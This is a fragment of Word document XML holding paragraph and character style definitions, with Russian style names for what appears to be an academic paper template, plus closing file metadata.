    <w:pPr>
      <w:numPr>
        <w:numId w:val="49"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a5">
    <w:name w:val="Список источников"/>
    <w:basedOn w:val="a7"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="46"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="aff5"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="aff4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="aff7"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="aff6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff8">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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9">
    <w:name w:val="_Название рисунка"/>
    <w:basedOn w:val="affa"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81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b">
    <w:name w:val="_Рисунок"/>
    <w:basedOn w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81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E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="10"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="affa">
    <w:name w:val="caption"/>
    <w:aliases w:val="Вставленный объект"/>
    <w:basedOn w:val="a7"/>
    <w:next w:val="a7"/>
    <w:link w:val="affc"/>
    <w:uiPriority w:val="35"/>
    <w:locked/>
    <w:rsid w:val="00E25F8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d">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="affc">
    <w:name w:val="Название объекта Знак"/>
    <w:aliases w:val="Вставленный объект Знак"/>
    <w:link w:val="affa"/>
    <w:uiPriority w:val="35"/>
    <w:rsid w:val="00E25F81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8"/>
    <w:link w:val="affe"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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">
    <w:name w:val="Основной текст + Курсив"/>
    <w:aliases w:val="Интервал 0 pt15"/>
    <w:basedOn w:val="13"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="affe">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="13"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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0">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afff1">
    <w:name w:val="Подпись к картинке_"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afff2"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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2">
    <w:name w:val="Подпись к картинке"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afff1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81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E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:spacing w:val="3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character" w:customStyle="1" w:styleId="61">
    <w:name w:val="Основной текст (6)_"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="62"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00E25F81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E25F81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3">
    <w:name w:val="Подпись к картинке + Курсив"/>
    <w:aliases w:val="Интервал 0 pt11"/>
    <w:basedOn w:val="afff1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81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paragraph" w:customStyle="1" w:styleId="afff4">
    <w:name w:val="Основного текста"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afff5"/>
    <w:qFormat/>
    <w:rsid w:val="00301C5A"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afff6">
    <w:name w:val="Шапка для титульного листа"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afff7"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="0"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afff5">
    <w:name w:val="Основного текста Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afff4"/>
    <w:rsid w:val="00301C5A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afff8">
    <w:name w:val="Заголовок на титульном листе"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afff9"/>
    <w:rsid w:val="00744D92"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afff7">
    <w:name w:val="Шапка для титульного листа Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afff6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">
    <w:name w:val="Тема работы"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afffa"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afff9">
    <w:name w:val="Заголовок на титульном листе Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afff8"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afffb">
    <w:name w:val="Нумерация"/>
    <w:basedOn w:val="af9"/>
    <w:link w:val="afffc"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afffa">
    <w:name w:val="Тема работы Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="a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fffd">
    <w:name w:val="Используемые источники"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="afffe"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afa">
    <w:name w:val="Абзац списка Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="af9"/>
    <w:uiPriority w:val="34"/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afffc">
    <w:name w:val="Нумерация Знак"/>
    <w:basedOn w:val="afa"/>
    <w:link w:val="afffb"/>
    <w:rsid w:val="00744D9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ffff">
    <w:name w:val="Таблица"/>
    <w:basedOn w:val="af"/>
    <w:link w:val="affff0"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff1">
    <w:name w:val="Список_ТИРЕ Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="a1"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff2">
    <w:name w:val="Список_БУКВЫ Знак"/>
    <w:basedOn w:val="aff1"/>
    <w:link w:val="a0"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff3">
    <w:name w:val="Список_ЦИФРЫ Знак"/>
    <w:basedOn w:val="aff2"/>
    <w:link w:val="a4"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afffe">
    <w:name w:val="Используемые источники Знак"/>
    <w:basedOn w:val="aff3"/>
    <w:link w:val="afffd"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="Рисунок1"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="15"/>
    <w:rsid w:val="00744D92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af0">
    <w:name w:val="Название таблицы Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="af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affff0">
    <w:name w:val="Таблица Знак"/>
    <w:basedOn w:val="af0"/>
    <w:link w:val="affff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1">
    <w:name w:val="Приложение"/>
    <w:basedOn w:val="aff"/>
    <w:link w:val="affff2"/>
    <w:qFormat/>
    <w:rsid w:val="00744D92"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="Название рисунка Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="ad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15">
    <w:name w:val="Рисунок1 Знак"/>
    <w:basedOn w:val="ae"/>
    <w:link w:val="14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3">
    <w:name w:val="СИ"/>
    <w:basedOn w:val="af1"/>
    <w:link w:val="affff4"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:lang w:val="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff0">
    <w:name w:val="Введение_заключение Знак"/>
    <w:basedOn w:val="10"/>
    <w:link w:val="aff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fff2">
    <w:name w:val="Приложение Знак"/>
    <w:basedOn w:val="aff0"/>
    <w:link w:val="affff1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2">
    <w:name w:val="Программный код Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="3"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="affff4">
    <w:name w:val="СИ Знак"/>
    <w:basedOn w:val="af2"/>
    <w:link w:val="affff3"/>
    <w:rsid w:val="00744D92"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affff5">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00E25F81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7"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="005B4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8"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005B432A"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-comment">
    <w:name w:val="code-comment"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00160AF8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="normaltextrun">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="006E3D3D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="eop">
    <w:name w:val="eop"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="006E3D3D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="a7"/>
    <w:rsid w:val="006E3D3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1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00C064F7"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affff6">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00C064F7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="110">
    <w:name w:val="1.1"/>
    <w:basedOn w:val="a7"/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="delimsizing">
    <w:name w:val="delimsizing"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-mathml">
    <w:name w:val="katex-mathml"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mbin">
    <w:name w:val="mbin"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mclose">
    <w:name w:val="mclose"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mopen">
    <w:name w:val="mopen"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mord">
    <w:name w:val="mord"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mpunct">
    <w:name w:val="mpunct"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mrel">
    <w:name w:val="mrel"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="a7"/>
    <w:rsid w:val="00E25F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p1">
    <w:name w:val="p1"/>
    <w:basedOn w:val="a7"/>
    <w:rsid w:val="00E25F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1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sentencesextension">
    <w:name w:val="sentences___extension"/>
    <w:basedOn w:val="a8"/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="character" w:styleId="affff7">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="affff8">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a7"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F8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6">
    <w:name w:val="Заголовок_пункта"/>
    <w:basedOn w:val="af9"/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="40"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="affff9">
    <w:name w:val="Заголовок_таблицы"/>
    <w:basedOn w:val="af3"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affffa">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affffb">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="affffc">
    <w:name w:val="Источники"/>
    <w:basedOn w:val="a7"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1276"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="affffd">
    <w:name w:val="Название_таблицы"/>
    <w:basedOn w:val="affa"/>
    <w:qFormat/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:keepNext/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affffe">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="Неразрешенное упоминание1"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afffff">
    <w:name w:val="page number"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="af9"/>
    <w:uiPriority w:val="10"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="45"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afffff0">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="17">
    <w:name w:val="Сетка таблицы1"/>
    <w:basedOn w:val="a9"/>
    <w:next w:val="afb"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E25F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f1">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afffff2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afffff2">
    <w:name w:val="Текст концевой сноски Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afffff1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afffff3">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="afffff4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F81"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afffff4">
    <w:name w:val="Текст примечания Знак"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="afffff3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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locked/>
    <w:rsid w:val="00E25F81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E25F81"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML2">
    <w:name w:val="HTML Cite"/>
    <w:basedOn w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00E25F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8460D-032E-4076-8094-01EC594AC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2545</Words>
  <Characters>14512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2026-05-04T14:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-04T14:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>